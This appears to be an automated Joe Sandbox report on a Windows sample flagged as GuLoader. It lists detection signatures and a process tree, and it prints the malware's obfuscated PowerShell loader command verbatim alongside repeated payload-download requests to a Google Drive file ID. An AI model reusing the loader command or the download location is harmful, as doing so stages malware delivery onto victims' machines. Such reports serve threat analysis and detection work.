Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
YrCSUX2O3I.exe

Overview

General Information

Sample name:YrCSUX2O3I.exe
renamed because original name is a hash value
Original sample name:d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8.exe
Analysis ID:1588371
MD5:13dccf3d94c8435353a3bf886ca19e7e
SHA1:52474b83a6ea7cf75d1d4986b32e26d87b7074eb
SHA256:d15433cca1e4b6695379317ef0650e4cf9f07fcd5317b8d84343465f3d9186d8
Tags:exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Powershell drops PE file
Queues an APC in another process (thread injection)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w10x64
  • YrCSUX2O3I.exe (PID: 1460 cmdline: "C:\Users\user\Desktop\YrCSUX2O3I.exe" MD5: 13DCCF3D94C8435353A3BF886CA19E7E)
    • powershell.exe (PID: 7012 cmdline: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 3848 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.2577978803.000000000452E000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    System Summary

    barindex
    Sigma detected: Msiexec Initiated Connection
    Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 142.250.184.206, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 3848, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49974
    Sigma detected: Potential Binary Or Script Dropper Via PowerShell
    Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7012, TargetFilename: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exe
    Sigma detected: Non Interactive PowerShell Process Spawned
    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" , CommandLine: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" , CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\YrCSUX2O3I.exe", ParentImage: C:\Users\user\Desktop\YrCSUX2O3I.exe, ParentProcessId: 1460, ParentProcessName: YrCSUX2O3I.exe, ProcessCommandLine: "powershell.exe" -windowstyle minimized "$Willock=Get-Content -Raw 'C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Hjtryks.Tog';$Fysiologen=$Willock.SubString(2860,3);.$Fysiologen($Willock)" , ProcessId: 7012, ProcessName: powershell.exe

    Suricata Signatures

    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
    2025-01-11T01:30:44.581109+010028032702Potentially Bad Traffic192.168.2.949974142.250.184.206443TCP

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Multi AV Scanner detection for dropped file
    Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exeReversingLabs: Detection: 57%
    Source: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens\YrCSUX2O3I.exeVirustotal: Detection: 59%Perma Link
    Multi AV Scanner detection for submitted file
    Source: YrCSUX2O3I.exeVirustotal: Detection: 59%Perma Link
    Source: YrCSUX2O3I.exeReversingLabs: Detection: 57%
    AI detected suspicious sample
    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
    Source: YrCSUX2O3I.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49974 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.181.225:443 -> 192.168.2.9:49975 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49976 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49978 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49980 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49982 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49986 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49988 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49990 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49994 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49996 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:49998 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50002 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50004 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50010 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50012 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50014 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 142.250.184.206:443 -> 192.168.2.9:50016 version: TLS 1.2
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_004055D5 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_004055D5
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00406089 FindFirstFileW,FindClose,0_2_00406089
    Source: C:\Users\user\Desktop\YrCSUX2O3I.exeCode function: 0_2_00402706 FindFirstFileW,0_2_00402706
    Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
    Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49974 -> 142.250.184.206:443
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
    Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=f00OBi3ccykwuBwVcSD93e0g9-1F2jJz0SMWAVAPtW9lYKjIuG6xLUAs9sifniN6L3Le2qstf8CZGVQS5Ij3ByibVN4ne_ZBZUgNmpAhYPWzrOirz73E8LlAhltgilNjXQj030KsjdGw9CdPlGktGXEI0hnKZ5jm3xzWCJ7ywL2pzKJSJ0kdKEY
